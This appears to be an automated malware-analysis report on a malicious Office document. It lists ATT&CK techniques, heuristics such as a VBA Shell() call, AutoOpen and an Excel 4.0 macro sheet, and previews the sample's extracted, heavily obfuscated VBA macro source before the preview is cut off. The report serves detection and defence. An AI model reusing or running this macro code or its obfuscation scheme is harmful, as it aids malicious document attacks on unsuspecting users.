Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing legacy WordBasic and Excel 4.0 macro markers, along with significant VBA macros. The critical heuristic firing indicates a Shell() call within the VBA, suggesting the macro attempts to execute arbitrary commands. The obfuscated nature of the VBA code implies it is designed to download and run a secondary payload, a common tactic for initial compromise.
Heuristics (7)

- VBA macros detected (medium, 2 related findings) `OLE_VBA_MACROS`: Document contains VBA macro code.
- Shell() call in VBA (critical) `OLE_VBA_SHELL`: Shell() call in VBA.
- AutoOpen macro (high) `OLE_VBA_AUTOOPEN`: AutoOpen macro.
- OLE document has large unaccounted-for region (high) `OLE_SLACK_ANOMALY`: OLE file is 176,640 bytes but its declared streams total only 27,227 bytes — 149,413 bytes (85%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Legacy WordBasic auto-exec macro marker (medium) `OLE_LEGACY_WORDBASIC_AUTOEXEC`: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present (medium) `OLE_XLM_AUTOOPEN`: Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL (info) `EMBEDDED_URL`: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58224 bytes |

SHA-256 of macros.bas: 59328089f00ef9d2977a033d17b613f397d4dd71a618d2b17183fdaf1cadbd1c
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "rPYOowbT"
Function LCFaIORsGTpzr()
On Error Resume Next
Select Case iQIaO
Case 76642
qUSbMi = ociSb
BbThZR = Round(18503)
orWdL = Hex(WBtRC - ChrW(WmjYUF))
ivtQK = mzDwbB
Case 94661
TBdwwA = CByte(49077)
njQPcL = Log(rvMTt)
End Select
GwYGVEpNl = icqQH("@A4k dmMB", KstoL - KstoL + 3 + KstoL - KstoL, KstoL - KstoL + 3 + KstoL - KstoL)
Select Case ZuaLdZ
Case 18208
ESQEU = kGcWE
qIKAuX = Round(50477)
MBPhED = Hex(HCkUbQ - ChrW(iRAKH))
dlTpO = kRjaQG
Case 98630
GDCiA = CByte(32595)
dDrCd = Log(RZtAkP)
End Select
Select Case VUwKrG
Case 35197
KmOsh = zzXYjQ
QLluh = Round(14074)
BMnBlz = Hex(fnXLhE - ChrW(QBvsTY))
TWhVja = JLPJz
Case 75073
zwMGi = CByte(36197)
KANBM = Log(AJpCOi)
End Select
JLMNt = icqQH(",@a8z^p^S^mnP8N", HbiZS - HbiZS + 5 + HbiZS - HbiZS, HbiZS - HbiZS + 6 + HbiZS - HbiZS)
Select Case hqFjCY
Case 43048
bHCiR = TCill
iIVTU = Round(44289)
FzVNuQ = Hex(jHtjE - ChrW(wvisL))
uNhHH = ddEYU
Case 72650
fcRVF = CByte(89194)
SNjLJ = Log(hbJiZ)
End Select
Select Case OURDw
Case 94269
aGqNB = YKGnq
jjZNlR = Round(56080)
XlGrM = Hex(dqfiB - ChrW(wjnKb))
HjFwQ = vMBSo
Case 13621
lTZBoA = CByte(97416)
qjifb = Log(jnzvPm)
End Select
SXspkTjrh = icqQH("5q2^o^c^% z4@GZm", IAcjYs - IAcjYs + 7 + IAcjYs - IAcjYs, IAcjYs - IAcjYs + 8 + IAcjYs - IAcjYs)
Select Case JuSZV
Case 10900
AJLBYz = nWiwK
ORzWTo = Round(28335)
YBWZV = Hex(cZHcT - ChrW(CAjXhG))
WwQRwF = GruvF
Case 62878
kbHobD = CByte(74096)
OPGfPa = Log(lcpMK)
End Select
Select Case wwbYda
Case 5763
YWjCom = wFcOV
VwGcH = Round(18358)
LZkzJi = Hex(IzkBCJ - ChrW(pkuOQL))
DNWzoF = BVwWRS
Case 65850
llsJDF = CByte(676)
aLLpj = Log(LNqzt)
End Select
QjRLczPGJj = icqQH("425zXvBTqiuAjtttzJbjZ", PHkaUM - PHkaUM + 2 + PHkaUM - PHkaUM, PHkaUM - PHkaUM + 12 + PHkaUM - PHkaUM)
Select Case LNAVZ
Case 10694
coflr = qzIWH
lCswm = Round(55897)
wpJif = Hex(YZmXl - ChrW(jwzXj))
ZUnpMD = ipIFSR
Case 26441
JIQTGA = CByte(34707)
bEbXz = Log(JmiMB)
End Select
Select Case XNMRAT
Case 15579
cSjumO = rGNWf
ZFjIia = Round(31039)
GLUduc = Hex(kdtti - ChrW(SaGAF))
Zbtrij = zIfIS
Case 87153
LVGMRs = CByte(74147)
GdUczD = Log(fZIcd)
End Select
OihIMuo = icqQH("zPPAL i", IbGdG - IbGdG + 2 + IbGdG - IbGdG, IbGdG - IbGdG + 10 + IbGdG - IbGdG)
Select Case JNTptq
Case 59211
FUbAq = wTuiN
jVQWB = Round(74013)
qdFAqP = Hex(CImXX - ChrW(HcBIt))
GqKLfZ = TJnzz
Case 75831
ronAU = CByte(71004)
oLojWL = Log(CEUHd)
End Select
Select Case toVUBi
Case 81897
VwjND = kJjlLK
GURGZ = Round(45138)
saWfsv = Hex(zvqXv - ChrW(uzYpbY))
jRKNq = hmUEO
Case 52755
uIvbB = CByte(39903)
imOsO = Log(OHHvc)
End Select
ZsUiozfz = icqQH("kKP %^c^E^p^Szn", fJjRZ - fJjRZ + 4 + fJjRZ - fJjRZ, fJjRZ - fJjRZ + 11 + fJjRZ - fJjRZ)
Select Case BKMaPJ
Case 78530
Odcqcv = BlEzoG
iwDRz = Round(51036)
ZfYcja = Hex(ihfRM - ChrW(tFKXPS))
NVDwoY = jQXwKO
Case 71674
zDOtVj = CByte(36269)
YfbTW = Log(mjBju)
End Select
Select Case w
```

... (truncated)